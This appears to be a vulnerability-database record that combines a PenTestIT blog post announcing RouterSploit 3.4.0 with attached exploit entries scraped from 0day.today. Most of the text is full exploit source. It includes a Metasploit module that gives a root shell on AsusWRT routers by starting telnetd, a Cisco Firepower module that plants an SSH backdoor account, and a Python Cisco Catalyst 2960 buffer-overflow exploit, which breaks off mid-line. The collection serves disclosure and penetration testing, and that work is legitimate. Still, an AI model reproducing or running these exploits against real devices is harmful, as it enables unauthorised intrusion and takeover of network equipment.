UPDATED VERSION: RouterSploit 3.4.0

2018-10-18T18:13:04

Description

PenTestIT RSS Feed **RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as using `pycryptodome` from `pycrypto`and newer exploitation modules! Read on for the improvements. ![RouterSploit 3.4.0](http://pentestit.com/wp-content/uploads/2018/08/RouterSploit-3.3.0.png) What is RouterSploit? > The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aids penetration testing operations: > > * exploits – modules that take advantage of identified vulnerabilities > * creds – modules designed to test credentials against network services > * scanners – modules that check if a target is vulnerable to any exploit > * payloads – modules that are responsible for generating payloads for various architectures and injection points > * generic – modules that perform generic attacks ## Official RouterSploit 3.4.0 changelog: * Fixing `setup.py` resources * Switching to pycroptodome * Fixing communication API * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000) * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module * Adding credentials used by Mirai botnet * Fixing 3com Officeconnect RCE module * Fixing `exploits/routers/billion/billion_5200w_rce.py` module * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881) * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433) * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module * Fixing `exploits/routers/multi/tcp_32764_rce.py` module * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module * Adding `OptEncoder` option * Fixing `use` command issue * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py` * Adding tests for modules default values * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py` * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py` * Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py` * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py` * Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py` * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py` * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py` * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module ## Install RouterSploit 3.4.0: If you have an older version checked out, all you now need to get the latest version is run: `git pull` in the installed directory and you should be updated to the latest version. In case you do not have it installed, the current version is RouterSploit 3.4.0. Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run pip3 install -r requirements.txt ./rsf.py The post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).

{"id": "PENTESTIT:30AF1FB3AAE47288E800B5587788AF45", "type": "pentestit", "bulletinFamily": "blog", "title": "UPDATED VERSION: RouterSploit 3.4.0", "description": "PenTestIT RSS Feed\n\n**RouterSploit 3.4.0**, the long awaited [_router exploitation framework_](<http://pentestit.com/routersploit-router-exploitation-framework/>) update is out guys! This release includes some really cool features and updates such as using `pycryptodome` from `pycrypto`and newer exploitation modules! Read on for the improvements.\n\n![RouterSploit 3.4.0](http://pentestit.com/wp-content/uploads/2018/08/RouterSploit-3.3.0.png)\n\nWhat is RouterSploit?\n\n> The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following modules that aids penetration testing operations:\n> \n> * exploits \u2013 modules that take advantage of identified vulnerabilities\n> * creds \u2013 modules designed to test credentials against network services\n> * scanners \u2013 modules that check if a target is vulnerable to any exploit\n> * payloads \u2013 modules that are responsible for generating payloads for various architectures and injection points\n> * generic \u2013 modules that perform generic attacks\n\n## Official RouterSploit 3.4.0 changelog:\n\n * Fixing `setup.py` resources\n * Switching to pycroptodome\n * Fixing communication API\n * Adding `exploits/routers/asus/asuswrt_lan_rce.py` module (CVE-2018-5999/CVE-2018-6000)\n * Fixing `exploits/routers/asus/infosvr_backdoor_rce.py` module\n * Adding credentials used by Mirai botnet\n * Fixing 3com Officeconnect RCE module\n * Fixing `exploits/routers/billion/billion_5200w_rce.py` module\n * Fixing `exploits/routers/cisco/catalyst_2960_rocem.py` module (CVE-2017-3881)\n * Fixing `exploits/routers/cisco/firepower_management60_rce.py` module (CVE-2016-6433)\n * Fixing `exploits/routers/dlink/dir_815_850l_rce.py` module\n * Fixing `exploits/routers/multi/tcp_32764_rce.py` module\n * Fixing `exploits/routers/ubiquiti/airos_6_x.py` module\n * Adding `OptEncoder` option\n * Fixing `use` command issue\n * Adding tests `tests/exploits/cameras/cisco/test_video_surv_path_traversal.py`\n * Adding tests for modules default values\n * Adding tests `tests/exploits/routers/asus/test_infosvr_backdoor_rce.py`\n * Adding tests `tests/exploits/routers/billion/test_billion_5200w_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`\n * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`\n * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module\n * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module\n * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module\n\n## Install RouterSploit 3.4.0:\n\nIf you have an older version checked out, all you now need to get the latest version is run: `git pull` in the installed directory and you should be updated to the latest version. In case you do not have it installed, the current version is RouterSploit 3.4.0. Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run\n \n \n pip3 install -r requirements.txt\n ./rsf.py\n\nThe post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).", "published": "2018-10-18T18:13:04", "modified": "2018-10-18T18:13:04", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://pentestit.com/updated-version-routersploit-3-4-0/", "reporter": "Black", "references": [], "cvelist": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"], "lastseen": "2018-10-18T18:23:37", "viewCount": 1956, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:03BDD457-EC02-4410-980D-4DF5F9581298"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0780"]}, {"type": "cisco", "idList": ["CISCO-SA-20161005-FTMC", "CISCO-SA-20170317-CMP"]}, {"type": "cve", "idList": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"]}, {"type": "exploitdb", "idList": ["EDB-ID:40463", "EDB-ID:41872", "EDB-ID:41874", "EDB-ID:43881"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:080F4291E285CF4785D54B4437C49803", "EXPLOITPACK:71928799B4AFACF08ED27F548C324480", "EXPLOITPACK:E524B474934E6F9E393D9F5424380DCC"]}, {"type": "ics", "idList": ["ICSA-17-094-03"]}, {"type": "korelogic", "idList": ["KL-001-2016-007"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785361"]}, {"type": "nessus", "idList": ["700129.PRM", "CISCO-SA-20170317-CMP-DOS.NASL", "CISCO-SA-20170317-CMP-IOS.NASL", "CISCO-SA-20170317-CMP-IOSXE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106333", "OPENVAS:1361412562310106670", "OPENVAS:1361412562310106671"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138988", "PACKETSTORM:140467", "PACKETSTORM:142121", "PACKETSTORM:142132", "PACKETSTORM:146102", "PACKETSTORM:146560"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4CB1CCDD44A4FB09DC4B102A48D23618"]}, {"type": "saint", "idList": ["SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "SAINT:9EC44034675C3CB4D052F0A57AE94026"]}, {"type": "seebug", "idList": ["SSV:92711", "SSV:92932"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:02E235897DBA5868AE53102FE4D52D7B", "THN:BCA8EAC492CA7110C715BA2B88A40246"]}, {"type": "threatpost", "idList": ["THREATPOST:280E7DBF7FC18A42CA8004ED97B61008", "THREATPOST:318D2AC145FDD81AA284239AD4ADB10D", "THREATPOST:D91525C573A8C64689DAD91F6F0E4484", "THREATPOST:E9751CD9F9151AD294951F327FB466C8"]}, {"type": "zdt", "idList": ["1337DAY-ID-26656", "1337DAY-ID-27583", "1337DAY-ID-27904", "1337DAY-ID-29883"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-0780"]}, {"type": "cisco", "idList": ["CISCO-SA-20170317-CMP"]}, {"type": "cve", "idList": ["CVE-2016-6433"]}, {"type": "exploitdb", "idList": ["EDB-ID:40463", "EDB-ID:41872", "EDB-ID:41874"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E524B474934E6F9E393D9F5424380DCC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/CISCO/IOS_TELNET_ROCEM", "MSF:EXPLOIT/LINUX/HTTP/ASUSWRT_LAN_RCE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785361"]}, {"type": "nessus", "idList": ["CISCO-SA-20170317-CMP-IOS.NASL", "CISCO-SA-20170317-CMP-IOSXE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106670", "OPENVAS:1361412562310106671"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142121", "PACKETSTORM:142132", "PACKETSTORM:146560"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4CB1CCDD44A4FB09DC4B102A48D23618"]}, {"type": "saint", "idList": ["SAINT:1FAFFE9723ECA2EE5DFB56A36466F828"]}, {"type": "seebug", "idList": ["SSV:92932"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:02E235897DBA5868AE53102FE4D52D7B", "THN:BCA8EAC492CA7110C715BA2B88A40246"]}, {"type": "threatpost", "idList": ["THREATPOST:D91525C573A8C64689DAD91F6F0E4484", "THREATPOST:E9751CD9F9151AD294951F327FB466C8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27583", "1337DAY-ID-27904", "1337DAY-ID-29883"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-6433", "epss": "0.242910000", "percentile": "0.958500000", "modified": "2023-03-14"}, {"cve": "CVE-2017-3881", "epss": "0.974020000", "percentile": "0.998350000", "modified": "2023-03-14"}, {"cve": "CVE-2018-5999", "epss": "0.791760000", "percentile": "0.976990000", "modified": "2023-03-14"}, {"cve": "CVE-2018-6000", "epss": "0.684230000", "percentile": "0.973690000", "modified": "2023-03-14"}], "vulnersScore": 2.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659980328, "score": 1683995507, "epss": 1678871962}, "_internal": {"score_hash": "d05b97e4565a12789ecb8158a20e78d7"}}

{"zdt": [{"lastseen": "2018-03-09T16:09:48", "description": "The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "zdt", "title": "AsusWRT LAN Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "1337DAY-ID-29883", "href": "https://0day.today/exploit/description/29883", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to\r\n perform a POST in certain cases. This can be combined with another vulnerability in\r\n the VPN configuration upload routine that sets NVRAM configuration variables directly\r\n from the POST request to enable a special command mode.\r\n This command mode can then be abused by sending a UDP packet to infosvr, which is running\r\n on port UDP 9999 to directly execute commands as root.\r\n This exploit leverages that to start telnetd in a random port, and then connects to it.\r\n It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <[email\u00a0protected]>' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],\r\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],\r\n ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],\r\n ['CVE', '2018-5999'],\r\n ['CVE', '2018-6000']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'AsusWRT < v3.0.0.4.384.10007',\r\n {\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n }\r\n ],\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'DisclosureDate' => 'Jan 22 2018',\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n Opt::RPORT(9999)\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])\r\n ])\r\n end\r\n\r\n def exploit\r\n # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD\r\n # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\")\r\n\r\n data = post_data.to_s\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/vpnupload.cgi\",\r\n 'method' => 'POST',\r\n 'rport' => datastore['ASUSWRTPORT'],\r\n 'data' => data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - Successfully set the ateCommand_flag variable.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\")\r\n end\r\n\r\n\r\n # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.\r\n info_pdu_size = 512 # expected packet size, not sure what the extra bytes are\r\n r = Random.new\r\n\r\n ibox_comm_pkt_hdr_ex =\r\n [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC\r\n [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15\r\n [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33\r\n r.bytes(4) + # Info, don't know what this is\r\n r.bytes(6) + # MAC address\r\n r.bytes(32) # Password\r\n\r\n telnet_port = rand((2**16)-1024)+1024\r\n cmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*')\r\n pkt_syscmd =\r\n [cmd.length,0x00].pack('C*') + # cmd length\r\n cmd # our command\r\n\r\n pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)\r\n\r\n connect_udp\r\n udp_sock.put(pkt_final) # we could process the response, but we don't care\r\n disconnect_udp\r\n\r\n print_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\")\r\n sleep(10)\r\n\r\n begin\r\n ctx = { 'Msf' => framework, 'MsfExploit' => self }\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })\r\n if not sock.nil?\r\n print_good(\"#{peer} - Success, shell incoming!\")\r\n return handler(sock)\r\n end\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n sock.close if sock\r\n end\r\n\r\n print_bad(\"#{peer} - Well that didn't work... try again?\")\r\n end\r\nend\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/29883", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T11:32:00", "description": "This Metasploit module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability.", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "zdt", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "1337DAY-ID-26656", "href": "https://0day.today/exploit/description/26656", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/26656", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-09T05:06:38", "description": "Exploit for hardware platform in category remote exploits", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "zdt", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE11 - ROCEM Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-12T00:00:00", "id": "1337DAY-ID-27583", "href": "https://0day.today/exploit/description/27583", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow\r\n# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\r\n# Date: 04.10.2017\r\n# Exploit Author: https://twitter.com/artkond\r\n# Vendor Homepage: https://www.cisco.com/\r\n# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)\r\n# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11\r\n# CVE : CVE-2017-3881\r\n# Description:\r\n#\r\n# The exploit connects to the Catalyst switch and patches\r\n# it execution flow to allow credless telnet interaction \r\n# with highest privilege level\r\n#\r\n \r\n \r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n \r\nset_credless = True\r\n \r\nif len(sys.argv) < 3:\r\n print sys.argv[0] + ' [host] --set/--unset'\r\n sys.exit()\r\nelif sys.argv[2] == '--unset':\r\n set_credless = False\r\nelif sys.argv[2] == '--set':\r\n pass\r\nelse:\r\n print sys.argv[0] + ' [host] --set/--unset'\r\n sys.exit()\r\n \r\n \r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n \r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\nprint '[+] Sending cluster option'\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n \r\n \r\n \r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x3d\\x55\\xdc' # +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is 